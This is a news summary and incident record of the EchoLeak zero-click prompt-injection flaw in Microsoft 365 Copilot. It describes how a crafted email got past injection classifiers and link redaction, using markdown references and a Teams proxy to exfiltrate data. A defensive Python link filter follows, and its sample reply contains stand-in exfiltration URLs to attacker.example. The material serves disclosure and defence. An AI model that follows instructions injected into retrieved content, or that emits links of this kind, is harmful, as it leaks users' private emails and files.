Aim Security: Microsoft 365 Copilot ‘zero-click’ vulnerability enabled data exfiltration

Microsoft Patches Critical Zero-Click Flaw in Microsoft 365 Copilot

Microsoft has addressed a severe "zero-click" vulnerability in its Microsoft 365 Copilot AI tool, tracked as CVE-2025-32711 (CVSS 9.3), which could have enabled attackers to exfiltrate sensitive data without user interaction. Discovered by Aim Security and dubbed "EchoLeak," the flaw allowed unauthorized access to a victim’s Outlook emails, OneDrive files, SharePoint sites, and Microsoft Teams chat history via a specially crafted email.

The exploit bypassed multiple security layers, including Copilot’s cross-prompt injection attack (XPIA) classifiers and link redaction protections, by leveraging markdown references and a Microsoft Teams URL proxy endpoint to transmit stolen data to an attacker-controlled server. Unlike traditional phishing attacks, this method did not require the victim to click a malicious link—simply referencing the attacker’s email in a Copilot query could trigger the data leak.

Aim Security demonstrated that attackers could increase the likelihood of exploitation by sending multiple emails on varied topics or a single long, segmented email covering subjects likely to be queried by the victim. While Microsoft confirmed the flaw had not been exploited in the wild, security experts warn that similar vulnerabilities may exist in other retrieval-augmented generation (RAG)-based AI tools, highlighting a broader risk in AI assistant architectures.

The patch resolves the issue, requiring no further user action. However, the incident underscores the need for runtime guardrails, stricter input scoping, and clear separation between trusted and untrusted data in AI systems.
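One concrete form of the "prompt-level filter" and trusted/untrusted separation called for here, as an added example (not code from Aim Security, Microsoft or the article): an output-side check that parses every link an assistant's markdown reply would render, including reference-style definitions that an image renderer fetches without any click, and strips any link that points off an allowlist or that routes through an allowed proxy host while carrying an external URL in its query string. The allowlist, the proxy URL shape (target in a query parameter) and the sample reply are constructed assumptions, not details taken from the article.

```python
"""Output-side link filter for an AI assistant's markdown replies.

Added example, not code from Aim Security, Microsoft or the article:
it implements the "prompt-level filter to block suspicious links"
mitigation described above. Assumptions: the assistant's reply is
markdown, and the deployment maintains an allowlist of first-party
hosts, including any URL proxy it relies on. All hostnames below are
constructed placeholders.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed allowlist: hosts the assistant may legitimately link to.
ALLOWED_HOSTS = {"intranet.example.com", "proxy.example.com"}

# [text](url ...) and ![alt](url ...); group 1 is the URL.
_INLINE = re.compile(r"!?\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")
# Reference definitions "[label]: url"; group 2 is the URL. A renderer
# fetches image references automatically, so every definition counts.
_REF_DEF = re.compile(r"^[ \t]{0,3}\[([^\]]+)\]:[ \t]*(\S+).*$", re.MULTILINE)


def embedded_external_url(url, allowed_hosts):
    """Return an external URL carried in the query string of an allowed
    host (the redirector/proxy pattern), or None."""
    for values in parse_qs(urlparse(url).query).values():
        for value in values:  # parse_qs has already percent-decoded
            if value.lower().startswith(("http://", "https://")):
                inner_host = (urlparse(value).hostname or "").lower()
                if inner_host not in allowed_hosts:
                    return value
    return None


def classify(url, allowed_hosts=ALLOWED_HOSTS):
    """Return a reason string if the URL must not leave the assistant's
    output, or None if it is acceptable."""
    parts = urlparse(url)
    if not parts.scheme and not parts.netloc:
        return None  # relative link against the assistant's own origin
    if parts.scheme not in ("http", "https"):
        return "non-http scheme"
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return "external host"
    inner = embedded_external_url(url, allowed_hosts)
    if inner:
        return f"proxied external url ({urlparse(inner).hostname})"
    return None


def filter_reply(markdown, allowed_hosts=ALLOWED_HOSTS):
    """Strip disallowed links from a reply. Returns (clean_markdown,
    findings) where findings is a list of (url, reason) for logging."""
    findings = []

    def _inline(match):
        reason = classify(match.group(1), allowed_hosts)
        if reason:
            findings.append((match.group(1), reason))
            return "[link removed]"
        return match.group(0)

    def _definition(match):
        reason = classify(match.group(2), allowed_hosts)
        if reason:
            findings.append((match.group(2), reason))
            return ""  # drop the definition; the reference renders as text
        return match.group(0)

    clean = _INLINE.sub(_inline, markdown)
    clean = _REF_DEF.sub(_definition, clean)
    return clean, findings


# Constructed sample reply: one auto-fetched image pointing off-site and
# one reference-style link routed through the allowed proxy.
SAMPLE_REPLY = """Here is the summary you asked for.

![status](https://attacker.example/pixel.png?d=sample-data)
See the [policy][1] and the [portal](https://intranet.example.com/home).

[1]: https://proxy.example.com/fetch?url=https%3A%2F%2Fattacker.example%2Fc
"""

if __name__ == "__main__":
    clean_text, hits = filter_reply(SAMPLE_REPLY)
    for url, reason in hits:
        print(f"blocked {url}: {reason}")
    print(clean_text)
```

Running the script reports both constructed links as blocked and prints the reply with the off-site image replaced and the proxied reference definition dropped, while the first-party portal link survives. In a deployment the `findings` list is the detection telemetry worth forwarding to the SIEM or DLP pipeline; the filter is defence in depth on the output side and does not replace keeping untrusted email out of the retrieval scope in the first place.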

Source: https://www.scworld.com/news/microsoft-365-copilot-zero-click-vulnerability-enabled-data-exfiltration

TPRM report: https://www.rankiteo.com/company/aim-security

{
  "id": "aim1765254813",
  "linkid": "aim-security",
  "type": "Vulnerability",
  "date": "6/2025",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks"
}
{
  "affected_entities": [
    {"industry": "Software/Cloud Services", "name": "Microsoft", "type": "Technology Company"}
  ],
  "attack_vector": "Specially crafted email",
  "data_breach": {
    "data_exfiltration": "Yes (via crafted GET requests to attacker-controlled server)",
    "personally_identifiable_information": "Yes",
    "sensitivity_of_data": "High (personally identifiable and corporate-sensitive information)",
    "type_of_data_compromised": [
      "Outlook emails",
      "OneDrive files",
      "Office documents",
      "SharePoint data",
      "Microsoft Teams chat history"
    ]
  },
  "description": "Microsoft patched a 'zero-click' flaw in its Microsoft 365 Copilot retrieval-augmented generation (RAG) tool that could have allowed for exfiltration of sensitive data. The vulnerability, tracked as CVE-2025-32711, would have allowed an attacker to extract potentially sensitive information from a user’s connected Microsoft 365 services by sending a specially crafted email.",
  "impact": {
    "data_compromised": "Sensitive information from Outlook email, OneDrive storage, Office files, SharePoint sites, and Microsoft Teams chat history",
    "identity_theft_risk": "High",
    "systems_affected": "Microsoft 365 Copilot, Microsoft 365 services (Outlook, OneDrive, Office, SharePoint, Teams)"
  },
  "initial_access_broker": {"entry_point": "Specially crafted email to Microsoft 365 Copilot"},
  "investigation_status": "Patched (no active exploitation reported)",
  "lessons_learned": "The incident highlights risks in RAG-based AI agents processing untrusted inputs alongside internal data, necessitating runtime guardrails, stricter input scoping, and separation between trusted and untrusted content.",
  "post_incident_analysis": {
    "corrective_actions": [
      "Microsoft patched CVE-2025-32711",
      "Organizations advised to implement runtime guardrails and DLP measures"
    ],
    "root_causes": [
      "LLM Scope Violation in Microsoft 365 Copilot",
      "Bypass of cross-prompt injection attack (XPIA) classifiers",
      "Exploitation of Microsoft Teams URL format to bypass CSP guardrails"
    ]
  },
  "recommendations": [
    "Disable external email ingestion by RAG tools like Copilot",
    "Enforce data loss prevention (DLP) tags to flag requests involving sensitive information",
    "Apply prompt-level filters to block suspicious links and structured outputs"
  ],
  "references": [
    {"source": "Aim Security"},
    {"source": "SC Media"},
    {"source": "SOCRadar (Ensar Seker)"},
    {"source": "Microsoft Disclosure (CVE-2025-32711)"},
    {"source": "Teams Developer Tech Community (Microsoft employee comment)"}
  ],
  "response": {
    "containment_measures": "Patch released by Microsoft (no further user action required)",
    "remediation_measures": "Microsoft patched the vulnerability (CVE-2025-32711)",
    "third_party_assistance": "Aim Security (discovery and proof-of-concept)"
  },
  "title": "EchoLeak: Zero-Click Flaw in Microsoft 365 Copilot",
  "type": "AI Command Injection",
  "vulnerability_exploited": "CVE-2025-32711 (CVSS 9.3)"
}